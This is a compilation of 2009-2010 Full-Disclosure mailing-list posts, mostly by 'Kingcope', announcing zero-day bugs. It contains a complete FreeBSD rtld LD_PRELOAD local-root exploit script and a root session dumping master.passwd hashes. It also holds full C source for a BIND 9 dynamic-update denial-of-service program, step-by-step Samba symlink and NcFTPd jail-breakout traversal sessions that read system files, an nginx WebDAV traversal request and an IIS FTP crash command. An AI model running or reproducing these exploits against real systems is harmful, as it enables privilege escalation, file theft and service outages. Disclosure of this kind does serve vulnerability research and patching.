fact that he can *generate* the symlink breaks ... > > Nothing breaks if the admin sets "wide links = no" for that share: the > link is not followed. > > > But Samba supports dropping a user into a path ... > > I never noticed such support documented: references please? > > > ... and it really does need to keep him there. > > You cannot "break out" of shares with "wide links = no". > > > ... Samba is supposed to match Windows semantics in general. > > No please, do not dumb it down. > > Cheers, Paul > > Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ > School of Mathematics and Statistics University of SydneyAustralia ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Samba Remote Zero-Day Exploit
Samba Remote Directory Traversal logic fuckup discovered & exploited by Kingcope in 2010 It seems there was a quite similar bug found back in 2004: http://marc.info/?l=bugtraq&m=109658688505723&w=2 A remote attacker can read, list and retrieve nearly all files on the System remotely. Required is a valid samba account for a share which is writeable OR a writeable share which is configured to be a guest account share, in this case this is a preauth exploit. The attacker can write for example into /tmp or where the account he is connecting with has access to (/home/ etc). Exploit session (using the patched smbclient exploit): smb is a samba user created. r...@nr-pentest:~/Downloads/samba-3.4.5/source3# /usr/local/samba/bin/smbclient -s /etc/samba/smb.conf -Usmb ///testmount/ Enter smb's password: Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.4.0] smb: \> ls . D0 Wed Feb 3 14:27:03 2010 .. D0 Wed Feb 3 14:19:13 2010 testD0 Wed Feb 3 14:19:13 2010 xxx A 1955 Wed Feb 3 14:22:42 2010 45503 blocks of size 2097152. 24437 blocks available smb: \> symlink ../../../../../ foobar smb: \> ls . D0 Wed Feb 3 14:27:47 2010 .. D0 Wed Feb 3 14:19:13 2010 xxx A 1955 Wed Feb 3 14:22:42 2010 foobar D0 Mon Feb 1 20:29:12 2010 45503 blocks of size 2097152. 24437 blocks available smb: \> ls .. NT_STATUS_OBJECT_PATH_SYNTAX_BAD listing \.. 45503 blocks of size 2097152. 24437 blocks available smb: \> cd foobar smb: \foobar\> ls . D0 Mon Feb 1 20:29:12 2010 .. D0 Mon Feb 1 20:29:12 2010 initrd.img.old 7646184 Mon Jan 18 13:15:48 2010 boot.ini 18832 Mon Feb 1 20:29:12 2010 homeD0 Mon Jan 18 13:08:24 2010 initrd.img 8007195 Thu Jan 21 21:51:26 2010 .cache DH0 Sat Jan 23 14:19:08 2010 opt D0 Sat Jan 30 11:39:59 2010 lib D0 Thu Jan 21 21:13:01 2010 usr D0 Sun Jan 31 22:08:11 2010 .libs DH0 Thu Jan 21 12:30:48 2010 var D0 Sun Jan 31 21:14:42 2010 bin D0 Mon Jan 18 13:31:14 2010 selinux D0 Tue Oct 20 01:05:22 2009 rootD0 Tue Feb 2 19:43:59 2010 vmlinuz.old3890400 Fri Oct 16 20:03:49 2009 vmlinuz3890560 Thu Dec 10 20:33:26 2009 etc D0 Wed Feb 3 14:17:29 2010 srv D0 Sat Jan 23 20:17:29 2010 proc DR0 Wed Feb 3 14:10:41 2010 dev D0 Wed Feb 3 14:11:02 2010 bootD0 Thu Jan 21 21:51:26 2010 mnt D0 Sat Jan 23 19:26:23 2010 media D0 Fri Jan 29 08:32:31 2010 cdrom D0 Mon Jan 18 12:40:11 2010 tmp D0 Wed Feb 3 14:26:20 2010 sbinD0 Thu Jan 21 21:50:58 2010 lost+found D0 Mon Jan 18 12:39:57 2010 sys D0 Wed Feb 3 14:10:41 2010 45503 blocks of size 2097152. 24437 blocks available smb: \foobar\> put and get works in the folder now! list open shares, this is normal operation mode not an exploit: r...@nr-pentest:~/Downloads/samba-3.4.5/source3/client# /usr/local/samba/bin/smbclient -s /etc/samba/smb.conf -L /// Enter root's password: Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.4.0] Sharename Type Comment - --- testmount Disk // < this share is writable and exploitable!! print$ Disk Printer Drivers IPC$IPC IPC Service (nr-pentest server (Samba, Ubuntu)) Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.4.0] Server Comment ---- NR-PENTEST nr-pentest server (Samba
[Full-disclosure] Samba Remote Zero-Day Exploit
Hello list, this is Kingcope. You can view a demonstration of the zeroday entitled 'Samba Remote Zero-Day Exploit' with full details on youtube. The bug is a logic fuckup. http://www.youtube.com/watch?v=NN50RtZ2N74 I added some nice greek tune so turn your speakers on (or off). Greetings to Alex and andi. Cheerio and Signed, //Kingcope ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CCCCC
sha1sum.exe C df2e3c64366d2dc79f2fc6a06c6a2bfdd82218b0 *C ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Reading Mission Control Data out of Predator Drone video feeds
The screenshot of the UAV is a UAV video I found on the internet. I am not sure if this is actually a predator drone. It looks like it has firing capabilities tough and has embedded data in the video as predator drones have. I also dont have any satellite connection available here. Regards, kcope 2009/12/21 McGhee, Eddie : > Very interesting mate, nice to see the feeds for those of us without access > to a sat. > > -Original Message- > From: full-disclosure-boun...@lists.grok.org.uk > [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Kingcope > Sent: 20 December 2009 18:02 > To: full-disclosure@lists.grok.org.uk; bugt...@securityfocus.com > Subject: [Full-disclosure] Reading Mission Control Data out of Predator Drone > video feeds > > A short just for fun research paper (see attachment). > > Cheers, > > Kingcope > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Flieg wenn du fliegen kannst, lieb wenn du lieben kannst ; fly when you can fly, love when you can love
I publish my exploits for less then 50 cents, so I can post as I want. Look at the bottom of the previous post - you will find one of my most sophisticated remote system level exploits that will r0x0r a win2k3 box in less than 1 second. http://www.liveleak.com/view?i=f64_1206782892 http://www.liveleak.com/view?i=f64_1206782892 http://www.liveleak.com/view?i=f64_1206782892 http://www.liveleak.com/view?i=f64_1206782892 http://www.liveleak.com/view?i=f64_1206782892 Am 7. Dezember 2009 20:40 schrieb PEra : > Kingcope wrote: >> "Man sagt die Augen sind der Spiegel meiner Seele, >> und deswegen ist es dunkel an dem Ort an dem ich lebe, > > "Seele" auf "lebe"? Ist das der Reim-dich-oder-ich-beiß'-dich-Style? > >> Bushido > > 'nuff said. > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Flieg wenn du fliegen kannst, lieb wenn du lieben kannst ; fly when you can fly, love when you can love
"Man sagt die Augen sind der Spiegel meiner Seele, und deswegen ist es dunkel an dem Ort an dem ich lebe, in dem kleinen Platz hier drin ist es Herbst, und an die Wand schreib ich mit Blut einen Vers, flieg wenn du fliegen kannst, lieb wenn du lieben kannst, weil du nie kriegst was du kriegen kannst, dort kommen die Fremden und sie suchen den Größten, hör auf dein Herz denn du musst wählen zwischen Gutem und Bösen, Mama, das ist die Nacht in der wir kämpfen und sie zwingen mich dazu, deswegen hasse ich die Menschen, in diesem harten Leben gibt es keinen Ort an dem ich frei sein kann, ausser dann im Garten Eden, ich hab Blasen an den Füssen weil ich Barfuß geh, wenn ich laufe wein ich Salz denn dieser Pfad tut weh, ich wünschte Gott gäb mir ein Pflaster damit Wunden heilen, halte durch denn man muss stark in diesen Stunden sein, hier nimm meine Hand, bitte bleib bei mir ich verliere mein Verstand, sie fangen meinen Mut und brechen meinen Widerstand, denn sie haben Angst weil ich Hoffnung in den Liedern fand." Bushido "They say the eyes are the mirror of my soul, and so it is dark at the place where I live, In here, in the small space, it's autumn, and on the wall with blood I write a verse, fly when you can fly, love when you can love, because you'll never get what you can get, there come the foreigners and they look for the greatest, listen to your heart because you have to choose between good and evil; Mom, this is the night we fight, and they force me to that's why I hate the people, in this hard life, there is no place where I can be free, except then in the garden of Eden, I have blisters on my feet because I go barefoot, I am crying salt when I walk this path because it hurts, I wish to God I'd give a patch to heal wounds, hold through because you have to be strong in these hours, Here take my hand, please stay with me I lose my mind they catch my courage and break my resistance, because they are afraid because I found hope in the songs." Bushido http://www.youtube.com/watch?v=rsBeZgaUG2I xpl.pl Description: Binary data ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ** FreeBSD local r00t zeroday
** FreeBSD local r00t 0day
Discovered & Exploited by Nikolaos Rangos also known as Kingcope.
Nov 2009 "BiG TiME"
"Go fetch your FreeBSD r00tkitz" // http://www.youtube.com/watch?v=dDnhthI27Fg
There is an unbelievable simple local r00t bug in recent FreeBSD versions.
I audited FreeBSD for local r00t bugs a long time *sigh*. Now it pays out.
The bug resides in the Run-Time Link-Editor (rtld).
Normally rtld does not allow dangerous environment variables like LD_PRELOAD
to be set when executing setugid binaries like "ping" or "su".
With a rather simple technique rtld can be tricked into
accepting LD variables even on setugid binaries.
See the attached exploit for details.
Example exploiting session
**
%uname -a;id;
FreeBSD r00tbox.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21
15:48:17 UTC 2009
r...@almeida.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386
uid=1001(kcope) gid=1001(users) groups=1001(users)
%./w00t.sh
FreeBSD local r00t zeroday
by Kingcope
November 2009
env.c: In function 'main':
env.c:5: warning: incompatible implicit declaration of built-in
function 'malloc'
env.c:9: warning: incompatible implicit declaration of built-in
function 'strcpy'
env.c:11: warning: incompatible implicit declaration of built-in
function 'execl'
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
ALEX-ALEX
# uname -a;id;
FreeBSD r00tbox.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21
15:48:17 UTC 2009
r...@almeida.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386
uid=1001(kcope) gid=1001(users) euid=0(root) groups=1001(users)
# cat /etc/master.passwd
# $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29
kensmith Exp $
#
root:$1$AUbbHoOs$CCCsw7hsMB14KBkeS1xlz2:0:0::0:0:Charlie &:/root:/bin/csh
toor:*:0:0::0:0:Bourne-again Superuser:/root:
daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5::0:0:System &:/:/usr/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin
man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25::0:0:Sendmail Submission
User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66::0:0:UUCP
pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin
kcope:$1$u2wMkYLY$CCCuKax6dvYJrl2ZCYXA2:1001:1001::0:0:User
&:/home/kcope:/bin/sh
#
Systems tested/affected
**
FreeBSD 8.0-RELEASE *** VULNERABLE
FreeBSD 7.1-RELEASE *** VULNERABLE
FreeBSD 6.3-RELEASE *** NOT VULN
FreeBSD 4.9-RELEASE *** NOT VULN
*EXPLOIT*
#!/bin/sh
echo ** FreeBSD local r00t zeroday
echo by Kingcope
echo November 2009
cat > env.c << _EOF
#include
main() {
extern char **environ;
environ = (char**)malloc(8096);
environ[0] = (char*)malloc(1024);
environ[1] = (char*)malloc(1024);
strcpy(environ[1], "LD_PRELOAD=/tmp/w00t.so.1.0");
execl("/sbin/ping", "ping", 0);
}
_EOF
gcc env.c -o env
cat > program.c << _EOF
#include
#include
#include
#include
void _init() {
extern char **environ;
environ=NULL;
system("echo ALEX-ALEX;/bin/sh");
}
_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles
cp w00t.so.1.0 /tmp/w00t.so.1.0
./env
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] nginx - low risk webdav destination bug
Bug Title: nginx webdav copy/move method directory traversal
Program: nginx
Version: nginx/0.7.61 - other versions may also be affected
Website: http://sysoev.ru/nginx/
Severity: Low
Date discovered: 23 September 2009
The webdav component has to be enabled and the user has to have
permission to use the COPY or MOVE methods.
Description:
nginx ("Engine X", written by Igor Sysoev) has the ability to be used
as a webdav publishing server.
With webdav you can for example copy or move files from
one to a different location. The move and copy methods require a
"Destination:" HTTP header.
The destination header contains information about where the file
should be placed.
By using characters like "../" the attacker can traverse down the
directory tree and place files
outside the webroot. This is an insecure behaviour of the nginx webdav
module and can be
especially dangerous when nginx is used in a virtual hosting
environment. nginx runs as the
user nobody per default so normally this bug is not a big deal since
an attacker may only
be allowed to write files to /tmp/ or nobody owned directories. The
severity is low because
this attack requires webdav "upload" permissions.
Here is a sample request for the bug:
COPY /index.html HTTP/1.1
Host: localhost
Destination: http://localhost/../../../../../../../tmp/nginx.html
Thanks for your time,
Kingcope - kco...@googlemail.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Microsoft Internet Information Services 5.0/6.0 FTP SERVER DENIAL OF SERVICE ("Stack Exhaustion")
* MS IIS FTPD DoS ZER0DAY * There is a DoS vulnerability in the globbing functionality of IIS FTPD. Anonymous users can exploit this if they have read access to a directory!!! Normal users can exploit this too if they can read a directory. Example session where the anonymous user has read access to the folder "pub": C:\Users\Nikolaos>ftp 192.168.2.102 Verbindung mit 192.168.2.102 wurde hergestellt. 220 Microsoft FTP Service Benutzer (192.168.2.102:(none)): ftp 331 Anonymous access allowed, send identity (e-mail name) as password. Kennwort: 230 Anonymous user logged in. ftp> ls "-R p*/../" ... p*/../pub: pub ... p*/../pub: pub ... p*/../pub: pub ... p*/../pub: pub ... Verbindung beendet durch Remotehost. (MEANS: Remote Host has closed the connection) ftp> ftp> By looking into my debugging session with OllyDbg I see that an exception is raised and the ftp service crashes due to a "stack overflow", what is a stack exhaustion. If the ftp service is set to "manual" startup in services control manager the service needs to be restarted manually. IIS 5.0 and 6.0 were tested and are affected. Best Regards, Nikolaos Rangos ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft Internet Information Server ftpd zeroday
Hello list, I have to clarify some things on the globbing vulnerability here. The posted PoC (with the fine art) does NOT exploit IIS6 ftp servers, IIS6 ftp server IS affected by the buffer overflow but is properly protected by stack canaries. AFAIK it looks like a DoS on Windows Server 2003. Until someone finds a way to bypass Stack Canaries on recent Windows versions this remains a DoS on IIS6. Thanks to HD Moore and all people in the past you wrote exploits for my releases! Kudos! Nikolaos 2009/8/31 Kingcope : > (see attachment) > > Cheerio, > > Kingcope > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] FreeBSD stuff
I am not going to share IIS 0day anymore. http://isowarez.de/bsd-setusercontext.txt Bye. " BIG TIME " ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] THISISNOTMYEXPLOIT
Hello people, Yes there is a warning when the PoC is compiled. But I guess that is not a big issue. So about what PoC am I talking about? It seems that the moderator of bugtraq keeps blocking me because of fancy headlines maybe. The moderator of bugtraq blocked the actual exploit but let the following messages slip through. The PoC is on milw0rm.com and full disclosure. Thanks for clarifying the issue with the zones, I really have not a 100% understanding of the DNS protocol therefore I took a guess on my named.conf file and put the address into the PoC. Thanks for your time, Kingcope 2009/7/31 yersinia : > Repost for mailing problem. > On Fri, Jul 31, 2009 at 12:14 AM, yersinia wrote: >> >> On Thu, Jul 30, 2009 at 1:24 PM, Kingcope wrote: >>> >>> Hello again, >>> the default setting of 127.in-addr.arpa is a bit weird >>> >>> try >>> ./bind localhost >> >> Never mind. I have only a warning from gcc because it was necessary to >> include stdlib.h for malloc. >> >> But, the important thing is that it works as aspected. >> >> Regards >>> >>> lewls >>> >>> XD >>> >>> kcope >>> >>> 2009/7/30 Kingcope : >>> > I own nothing. >>> > >>> > Cheers, >>> > >>> > kcope >>> > > >>> >>> ___ >>> Full-Disclosure - We believe in it. >>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>> Hosted and sponsored by Secunia - http://secunia.com/ >> > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] THISISNOTMYEXPLOIT
Hello again, the default setting of 127.in-addr.arpa is a bit weird try ./bind localhost lewls XD kcope 2009/7/30 Kingcope : > I own nothing. > > Cheers, > > kcope > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] THISISNOTMYEXPLOIT
Hello again (I always forget something XD), the dos poc uses inet_addr() so u have to use an IP address as , example: ping ./bind 192.168.2.4 Cheers, kcope 2009/7/30 Kingcope : > I own nothing. > > Cheers, > > kcope > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] THISISNOTMYEXPLOIT
I own nothing.
Cheers,
kcope
/*
ISC BIND 9 Remote Dynamic Update Message Denial of Service PoC
"Based on:
http://www.securityfocus.com/data/vulnerabilities/exploits/35848.txt
by kingcope - this is basically a rewrite of the above, lame i know, but fun enough
for the [zone] argument you can try what is in the named.conf with "type master"
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define PORT 31337
struct dnspkt1 {
unsigned short transact;
unsigned short flags;
unsigned short zones;
unsigned short pr;
unsigned short updates;
unsigned short rrs;
};
struct dnspkt2 {
unsigned short type;
unsigned short class;
unsigned short name2;
unsigned short type2;
unsigned short class2;
unsigned short ttl1;
unsigned short ttl2;
unsigned short datalen;
unsigned short name3;
unsigned short type3;
unsigned short class3;
unsigned short ttl3;
unsigned short ttl4;
unsigned short datalen2;
};
int packdomain(char * dest, const char *src)
{
int i,n,cnt;
n=strlen(src);
dest[n+1]=0; // terminator
cnt=0;
for (i=n; i>0; i--)
{
if (src[i-1]=='.')
{
dest[i]=cnt;
cnt=0;
}
else
{
dest[i]=src[i-1];
cnt++;
}
}
dest[0]=cnt;
return n+2;
}
int main(int argc, char **argv) {
int sockfd, clilen;
struct sockaddr_in serv_addr, cli_addr;
struct dnspkt1 d1;
struct dnspkt2 d2;
printf("ISC BIND 9 Remote Dynamic Update Message Denial of Service PoC\n");
printf("Based on:\n");
printf("http://www.securityfocus.com/data/vulnerabilities/exploits/35848.txt\n";);
printf("by kingcope - this is basically a rewrite of the above, lame i know, but fun tough\n");
if (argc < 2) {
printf("usage: %s [zone]\n", argv[0]);
return 0;
}
sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sockfd < 0) {
printf("error on socket() call");
return -1;
}
memset(&serv_addr, '\0', sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
serv_addr.sin_addr.s_addr = INADDR_ANY;
serv_addr.sin_port = htons(PORT);
if (bind(sockfd, (struct sockaddr *) &serv_addr, sizeof(serv_addr)) < 0) {
printf("error binding socket\n");
return -1;
}
memset(&cli_addr, '\0', sizeof(cli_addr));
cli_addr.sin_family = AF_INET;
cli_addr.sin_addr.s_addr = inet_addr(argv[1]);
cli_addr.sin_port = htons(53);
memset(&d1, '\0', sizeof(d1));
memset(&d2, '\0', sizeof(d2));
d1.transact = htons(0x1cd6);
d1.flags = htons(0x2800);
d1.zones = htons(0x0001);
d1.pr = htons(0x0001);
d1.updates = htons(0x0001);
d1.rrs = 0;
char *name = (char*)malloc(8096);
char nam[1024];
if (argc < 3) {
/* Not sure if this is right to set as default, have no clue about dns proto
It works for me.. */
strcpy(nam, "127.in-addr.arpa");
} else {
strncpy(nam, argv[2], sizeof(nam));
nam[sizeof(nam)-1]=0;
}
int n=packdomain(name, (char*)nam);
d2.type = htons(0x0006);
d2.class = htons(0x0001);
d2.name2 = htons(0xc00c);
d2.type2 = htons(0x00ff);
d2.class2 = htons(0x0001);
d2.datalen = 0;
d2.name3 = htons(0xc00c);
d2.type3 = htons(0x00ff);
d2.class3 = htons(0x00ff);
d2.ttl1 = 0;
d2.ttl2 = 0;
d2.ttl3 = 0;
d2.ttl4 = 0;
d2.datalen2 = 0;
char buffer[1];
memcpy(buffer, &d1, sizeof(d1));
memcpy(buffer+sizeof(d1), name, n);
memcpy(buffer+sizeof(d1)+n, &d2, sizeof(d2));
clilen=sizeof(cli_addr);
sendto(sockfd, buffer, sizeof(d1)+sizeof(d2)+n, 0, (struct sockaddr *)&cli_addr, sizeof(cli_addr));
printf("aight!\n");
return 0;
}
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] NcFTPd <= 2.8.5 remote jail breakout
Hello list. Just to clarify the NcFTPd vulnerability affects all operating systems that NcFTPd runs on, not just FreeBSD. Cheers, kcope 2009/7/27 Kingcope : > NcFTPd <= 2.8.5 remote jail breakout > > Discovered by: > Kingcope > Contact: kcope2googlemail.com / http://isowarez.de > > Date: > 27th July 2009 > > Greetings: > Alex,Andi,Adize,wY!,Netspy,Revoguard > > Prerequisites: > Valid user account. > > Demonstration on FreeBSD 7.0-RELEASE and NcFTPd 2.8.5 (latest version): > > # ftp 192.168.2.5 > Connected to 192.168.2.5. > 220 localhost NcFTPd Server (unregistered copy) ready. > Name (192.168.2.5:root): kcope > 331 User kcope okay, need password. > Password: > 230-You are user #1 of 50 simultaneous users allowed. > 230- > 230 Restricted user logged in. > Remote system type is UNIX. > Using binary mode to transfer files. > ftp> get /etc/passwd passwd > local: passwd remote: /etc/passwd > 502 Unimplemented command. > 227 Entering Passive Mode (192,168,2,5,219,171) > 550 No such file. > ftp> ls .. > 227 Entering Passive Mode (192,168,2,5,218,102) > 553 Permission denied. > ftp> mkdir isowarez > 257 "/isowarez" directory created. > ftp> quote site symlink /etc/passwd isowarez/.message > 250 Symlinked. > ftp> cd isowarez > 250-"/isowarez" is new cwd. > 250- > 250-# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $ > 250-# > 250-root:*:0:0:Charlie &:/root:/bin/sh > 250-toor:*:0:0:Bourne-again Superuser:/root: > 250-daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin > 250-operator:*:2:5:System &:/:/usr/sbin/nologin > 250-bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin > 250-tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin > 250-kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin > 250-games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin > 250-news:*:8:8:News Subsystem:/:/usr/sbin/nologin > 250-man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin > 250-sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin > 250-smmsp:*:25:25:Sendmail Submission > User:/var/spool/clientmqueue:/usr/sbin/nologin > 250-mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin > 250-bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin > 250-proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin > 250-_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin > 250-_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin > 250-uucp:*:66:66:UUCP > pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico > 250-pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin > 250-www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin > 250-nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin > 250-kcope:*:1001:1001:User kcope:/home/kcope:/bin/csh > 250-messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/sbin/nologin > 250-polkit:*:562:562:PolicyKit Daemon User:/nonexistent:/sbin/nologin > 250-haldaemon:*:560:560:HAL Daemon User:/nonexistent:/sbin/nologin > 250-ftp:*:1002:14:User &:/home/ftp:/bin/sh > 250-cyrus:*:60:60:the cyrus mail server:/usr/local/cyrus:/bin/csh > 250-postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin > 250-test:*:1003:1003:test:/home/test:/bin/sh > 250-+testx:*:/bin/sh > 250 > ftp> > > +on freebsd you can symlink directories like ´/´ > > Cheerio, > > Kingcope > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] NcFTPd <= 2.8.5 remote jail breakout
NcFTPd <= 2.8.5 remote jail breakout
Discovered by:
Kingcope
Contact: kcope2googlemail.com / http://isowarez.de
Date:
27th July 2009
Greetings:
Alex,Andi,Adize,wY!,Netspy,Revoguard
Prerequisites:
Valid user account.
Demonstration on FreeBSD 7.0-RELEASE and NcFTPd 2.8.5 (latest version):
# ftp 192.168.2.5
Connected to 192.168.2.5.
220 localhost NcFTPd Server (unregistered copy) ready.
Name (192.168.2.5:root): kcope
331 User kcope okay, need password.
Password:
230-You are user #1 of 50 simultaneous users allowed.
230-
230 Restricted user logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get /etc/passwd passwd
local: passwd remote: /etc/passwd
502 Unimplemented command.
227 Entering Passive Mode (192,168,2,5,219,171)
550 No such file.
ftp> ls ..
227 Entering Passive Mode (192,168,2,5,218,102)
553 Permission denied.
ftp> mkdir isowarez
257 "/isowarez" directory created.
ftp> quote site symlink /etc/passwd isowarez/.message
250 Symlinked.
ftp> cd isowarez
250-"/isowarez" is new cwd.
250-
250-# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $
250-#
250-root:*:0:0:Charlie &:/root:/bin/sh
250-toor:*:0:0:Bourne-again Superuser:/root:
250-daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
250-operator:*:2:5:System &:/:/usr/sbin/nologin
250-bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
250-tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
250-kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
250-games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
250-news:*:8:8:News Subsystem:/:/usr/sbin/nologin
250-man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
250-sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
250-smmsp:*:25:25:Sendmail Submission
User:/var/spool/clientmqueue:/usr/sbin/nologin
250-mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
250-bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
250-proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
250-_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
250-_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
250-uucp:*:66:66:UUCP
pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
250-pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
250-www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
250-nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
250-kcope:*:1001:1001:User kcope:/home/kcope:/bin/csh
250-messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/sbin/nologin
250-polkit:*:562:562:PolicyKit Daemon User:/nonexistent:/sbin/nologin
250-haldaemon:*:560:560:HAL Daemon User:/nonexistent:/sbin/nologin
250-ftp:*:1002:14:User &:/home/ftp:/bin/sh
250-cyrus:*:60:60:the cyrus mail server:/usr/local/cyrus:/bin/csh
250-postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin
250-test:*:1003:1003:test:/home/test:/bin/sh
250-+testx:*:/bin/sh
250
ftp>
